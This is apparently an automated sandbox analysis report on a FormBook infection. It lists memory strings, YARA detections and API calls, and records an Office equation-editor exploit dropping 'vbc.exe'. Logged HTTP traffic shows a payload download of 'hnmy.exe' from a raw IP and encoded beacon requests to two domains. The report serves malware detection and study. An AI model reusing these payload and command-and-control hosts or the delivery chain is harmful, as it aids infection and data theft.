            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: explorer.exe, 00000006.00000000.531428827.0000000003E50000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmp | String found in binary or memory: http://sogou.9898top1.com/sscx.html
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: explorer.exe, 00000006.00000000.603581643.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.698588775.00000000020C0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.609127539.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
            Source: explorer.exe, 00000006.00000000.548374116.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
            Source: explorer.exe, 00000006.00000000.543806388.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: explorer.exe, 00000006.00000000.608259374.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.543545616.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.549824786.00000000044E7000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
            Source: explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.pir
            Source: explorer.exe, 00000006.00000000.544945610.0000000008391000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.545161733.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551698331.0000000008420000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551589349.0000000008391000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: explorer.exe, 00000006.00000000.540569412.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
            Source: msiexec.exe, 00000008.00000002.699478869.0000000002CD2000.00000004.00020000.sdmp | String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=aloebiotics.com&origin=sales_la
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://support.mozilla.org
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org
            Source: explorer.exe, 00000006.00000000.535970615.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.603307260.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCAAC72D.emf
            Source: unknown | DNS traffic detected: queries for: www.aloebiotics.com
            Source: global traffic | HTTP traffic detected: GET /hnmy.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 209.141.37.110Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.aloebiotics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global traffic | HTTP traffic detected: GET /b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.sjljtzsls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00432A4F GetKeyState,GetKeyState,GetKeyState,GetKeyState,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00435DBA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_02680F3F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0267CD5B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_026A0D3B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_0270FDDD
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000EC8C5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D8C8B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D8C90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D2D90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_000D2FB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_00B96F06
            Source: C:\Users\Public\vbc.exeCode function: String function: 007DF970 appears 68 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00425CA0 appears 138 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 0076DF5C appears 96 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 0076E2A8 appears 32 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 00425873 appears 32 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 007B3F92 appears 89 times
            Source: C:\Users\Public\vbc.exeCode function: String function: 007B373B appears 191 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 026B3F92 appears 105 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 026DF970 appears 81 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 026B373B appears 238 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0266DF5C appears 102 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0266E2A8 appears 38 times
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0044405D NtTerminateProcess,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00440058 NtCreateFile,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_004462A8 NtCreateFile,NtCreateSection,NtMapViewOfSection,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_004464A8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00440568 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_004415A8 NtWriteFile,NtCreateSection,NtClose,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00440688 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_0043FEE8 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00440C17 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
            Source: C:\Users\Public\vbc.exe | Code function: 4_2_00440F0A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004185F0 NtCreateFile,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004186A0 NtReadFile,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418720 NtClose,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004187D0 NtAllocateVirtualMemory,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_004185EA NtCreateFile,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00760078 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00760048 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_007600C4 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_007607AC NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075F900 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075F9F0 NtClose,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FAE8 NtQueryInformationProcess,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FB68 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FBB8 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FC60 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FC90 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FDC0 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FD8C NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FEA0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FFB4 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00760060 NtQuerySection,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_007610D0 NtOpenProcessToken,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00761148 NtOpenThread,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0076010C NtOpenDirectoryObject,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_007601D4 NtSetValueKey,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075F8CC NtWaitForSingleObject,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_00761930 NtSetContextThread,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075F938 NtWriteFile,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FA50 NtEnumerateValueKey,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FA20 NtQueryInformationFile,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FAB8 NtQueryValueKey,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FB50 NtCreateKey,
            Source: C:\Users\Public\vbc.exe | Code function: 5_2_0075FBE8 NtQueryVirtualMemory,
